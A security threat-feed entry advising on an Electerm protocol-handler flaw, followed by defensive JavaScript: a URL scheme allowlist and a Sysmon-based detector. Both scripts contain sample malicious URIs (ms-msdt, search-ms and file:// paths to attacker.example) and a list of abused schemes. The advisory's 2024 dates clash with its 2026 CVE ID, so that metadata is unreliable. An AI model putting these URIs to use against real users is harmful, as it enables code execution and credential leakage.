{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/electerm--3.8.15/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":9.6,"id":"CVE-2026-43941"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["electerm (\u003c= 3.8.15)"],"_cs_severities":["high"],"_cs_tags":["rce","terminal","protocol handler"],"_cs_type":"advisory","_cs_vendors":["electerm"],"content_html":"\u003cp\u003eElecterm, a cross-platform terminal application, is vulnerable to arbitrary protocol execution (CVE-2026-43941) in versions 3.8.15 and earlier. The flaw stems from the application\u0026rsquo;s failure to validate the scheme of URLs it passes to Electron\u0026rsquo;s \u003ccode\u003eshell.openExternal\u003c/code\u003e, which hands the string to whatever handler the operating system has registered for that scheme. An attacker who can control terminal output, for example through a compromised SSH server or a malicious plugin, can inject a crafted URI into the terminal, where Electerm renders it as a clickable hyperlink. If the user clicks it, Electerm opens it through the operating system\u0026rsquo;s default protocol handler, which can lead to code execution, credential leakage, or data exfiltration. 
This vulnerability requires user interaction (clicking the link) to be exploited.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a remote SSH server or otherwise gains control of content printed to the terminal.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a URI whose scheme maps to a dangerous protocol handler, such as \u003ccode\u003ems-msdt:\u003c/code\u003e, \u003ccode\u003esearch-ms:\u003c/code\u003e, or \u003ccode\u003efile://\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe URI is printed to the Electerm session connected to the compromised SSH server.\u003c/li\u003e\n\u003cli\u003eThe victim views the terminal output, in which Electerm renders the URI as a hyperlink.\u003c/li\u003e\n\u003cli\u003eThe victim clicks the hyperlink.\u003c/li\u003e\n\u003cli\u003eElecterm passes the URI to \u003ccode\u003eshell.openExternal\u003c/code\u003e without checking its scheme against an allowlist.\u003c/li\u003e\n\u003cli\u003eThe operating system invokes the handler registered for that scheme with the attacker\u0026rsquo;s payload (e.g., code execution via \u003ccode\u003ems-msdt:\u003c/code\u003e on Windows, or an NTLM hash leak when a \u003ccode\u003efile://\u003c/code\u003e URI points at an attacker-controlled share).\u003c/li\u003e\n\u003cli\u003eThe attacker achieves code execution in the victim\u0026rsquo;s user context or exfiltrates sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-43941 allows an attacker to execute arbitrary code on the victim\u0026rsquo;s machine, which can lead to full system compromise, data theft, or malware installation. Exposure is limited to Electerm users who view output from untrusted sessions, but any compromised or hostile remote host can produce such output. 
If successfully exploited, the attacker gains the privileges of the user running Electerm on the client machine, not merely those of the remote session.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Electerm Suspicious URI Invocation\u0026rdquo; to detect exploitation attempts against CVE-2026-43941 by monitoring process creation events whose command line carries an unusual protocol handler.\u003c/li\u003e\n\u003cli\u003eUntil a fixed release is available, apply the workaround of disabling hyperlink rendering in Electerm\u0026rsquo;s terminal settings so that injected URIs are not clickable.\u003c/li\u003e\n\u003cli\u003eMonitor the Electerm GitHub releases and security page for an update that addresses this issue.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-07-03T12:00:00Z","date_published":"2024-07-03T12:00:00Z","id":"/briefs/2024-07-electerm-rce/","summary":"Electerm versions 3.8.15 and earlier are vulnerable to arbitrary code execution due to improper validation of URLs, allowing attackers to execute commands by tricking users into clicking malicious links in the terminal.","title":"Electerm Arbitrary Protocol Execution Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-07-electerm-rce/"}],"language":"en","title":"CraftedSignal Threat Feed — Electerm (\u003c= 3.8.15)","version":"https://jsonfeed.org/version/1.1"}
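The brief describes the flaw as passing unvalidated URLs to Electron's `shell.openExternal`. The following is an added example, not Electerm's code or a patch from the project: the unsafe pattern beside a scheme-allowlisting wrapper. The function names (`safeExternalUrl`, `openLinkVulnerable`, `openLinkHardened`, `compare`), the injectable `opener` parameter, and the sample URIs are this example's own assumptions; in a real Electron main process `opener` would be `require('electron').shell.openExternal`.

```javascript
// Added example, not Electerm's code: the unsafe pattern beside an
// allowlisting wrapper around Electron's shell.openExternal. `opener` is an
// assumed injection point so this runs outside Electron; in an app you would
// pass require('electron').shell.openExternal.

// Schemes a terminal may hand to the OS without further checks.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Returns the normalised href if `raw` is safe to open, otherwise null.
function safeExternalUrl(raw) {
  if (typeof raw !== 'string') return null;
  // Terminal output can carry control bytes (ESC, NUL, CR) around a link;
  // strip them before parsing rather than trusting URL() to reject them.
  const cleaned = raw.replace(/[\u0000-\u001f\u007f]/g, '').trim();
  let url;
  try {
    url = new URL(cleaned); // throws on relative or malformed input
  } catch {
    return null;
  }
  // URL() lowercases the scheme, so "MS-MSDT:" and "ms-msdt:" compare equal.
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  // Embedded credentials are never wanted in a link clicked from a terminal.
  if (url.username || url.password) return null;
  return url.href;
}

// Unsafe: whatever string reached the main process is handed to the OS.
// This is the shape of the flaw the advisory describes.
function openLinkVulnerable(raw, opener) {
  opener(raw);
  return { opened: true, url: raw };
}

// Hardened: only allowlisted, well-formed URLs reach the OS handler.
function openLinkHardened(raw, opener) {
  const url = safeExternalUrl(raw);
  if (url === null) return { opened: false, url: null };
  opener(url);
  return { opened: true, url };
}

// Constructed sample inputs standing in for text printed by a hostile host.
const SAMPLE_URIS = [
  'https://example.com/docs',
  'HTTPS://EXAMPLE.com/A',
  'mailto:alice@example.com',
  ' https://example.com/x\u001b',          // link with a stray ESC byte
  'ms-msdt:/id example',                   // Windows troubleshooter handler
  'search-ms:query=x&crumb=location:\\\\attacker.example\\share',
  'file://attacker.example/share/x',       // UNC path: NTLM leak on Windows
  'https://user:pw@example.com/',
];

// Runs both patterns over the samples with a recording opener and returns
// what each one would have passed to the OS.
function compare(samples = SAMPLE_URIS) {
  const vulnerable = [];
  const hardened = [];
  for (const s of samples) openLinkVulnerable(s, (u) => vulnerable.push(u));
  for (const s of samples) openLinkHardened(s, (u) => hardened.push(u));
  return { vulnerable, hardened };
}

const { vulnerable, hardened } = compare();
console.log('vulnerable would open', vulnerable.length, 'of', SAMPLE_URIS.length);
console.log('hardened opens only:', hardened);
```

The allowlist is deliberately short: a terminal has no business launching `ms-msdt:`, `search-ms:`, `file:` or any vendor-registered scheme on a click, and adding schemes later is a one-line change, whereas a denylist of known-bad handlers is always a release behind the next Windows protocol abuse.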
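The recommendation refers to a Sigma rule that monitors process creation for unusual protocol handlers; the rule itself is not reproduced in the brief. As an added illustration of the detection logic it describes (not the CraftedSignal rule and not Electerm's code), the following runs a scheme match over constructed Sysmon Event ID 1 style records. The function names, the Electerm install path and image name, and all event contents are assumptions made for the example.

```javascript
// Added example: detection logic in the spirit of the "Detect Electerm
// Suspicious URI Invocation" rule, not the rule itself, run over constructed
// Sysmon Event ID 1 style records. Field names follow Sysmon; the Electerm
// install path and image name are assumptions.

// Protocol handlers the advisory names as abuse targets.
const SUSPICIOUS_SCHEMES = ['ms-msdt', 'search-ms', 'file'];

// Match "<scheme>:" only where it starts a token, so "profile:" in an
// ordinary argument does not trip the "file" entry.
const SCHEME_RE = new RegExp('(?<![\\w.-])(' + SUSPICIOUS_SCHEMES.join('|') + '):', 'gi');

function extractSuspiciousSchemes(commandLine) {
  const found = new Set();
  for (const m of commandLine.matchAll(SCHEME_RE)) found.add(m[1].toLowerCase());
  return [...found];
}

// True when the parent process is the Electerm binary (Windows or Unix path).
function isElectermParent(event) {
  return /(^|[\\\/])electerm(\.exe)?$/i.test(event.ParentImage || '');
}

// Returns a finding for one event, or null when nothing matched.
function evaluateEvent(event) {
  const schemes = extractSuspiciousSchemes(event.CommandLine || '');
  if (schemes.length === 0) return null;
  return {
    utcTime: event.UtcTime,
    image: event.Image,
    parentImage: event.ParentImage,
    schemes,
    // A handler spawned by the terminal itself is the attack chain in this
    // brief; the same handler under another parent is still worth a look.
    level: isElectermParent(event) ? 'high' : 'medium',
  };
}

function runDetection(events) {
  return events.map(evaluateEvent).filter((hit) => hit !== null);
}

// Constructed events; paths, timestamps and command lines are illustrative only.
const ELECTERM = 'C:\\Users\\alice\\AppData\\Local\\Programs\\electerm\\electerm.exe';
const SAMPLE_EVENTS = [
  { UtcTime: '2024-07-03 12:01:05', Image: 'C:\\Windows\\System32\\msdt.exe',
    ParentImage: ELECTERM,
    CommandLine: '"C:\\Windows\\System32\\msdt.exe" ms-msdt:/id example' },
  { UtcTime: '2024-07-03 12:01:09', Image: 'C:\\Windows\\explorer.exe',
    ParentImage: ELECTERM,
    CommandLine: 'explorer.exe "search-ms:query=x&crumb=location:\\\\attacker.example\\share"' },
  { UtcTime: '2024-07-03 12:02:30', Image: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
    ParentImage: ELECTERM,
    CommandLine: '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" https://example.com/docs' },
  { UtcTime: '2024-07-03 12:05:00', Image: 'C:\\Windows\\System32\\msdt.exe',
    ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: 'msdt.exe ms-msdt:/id example' },
];

for (const hit of runDetection(SAMPLE_EVENTS)) {
  console.log(`[${hit.level}] ${hit.utcTime} ${hit.image} <- ${hit.parentImage} schemes=${hit.schemes.join(',')}`);
}
```

Scoping the high-confidence tier to an Electerm parent keeps the alert tied to this attack chain; the medium tier catches the same handlers launched elsewhere, which is where the `file:` entry in particular will need tuning against legitimate tooling on a given fleet.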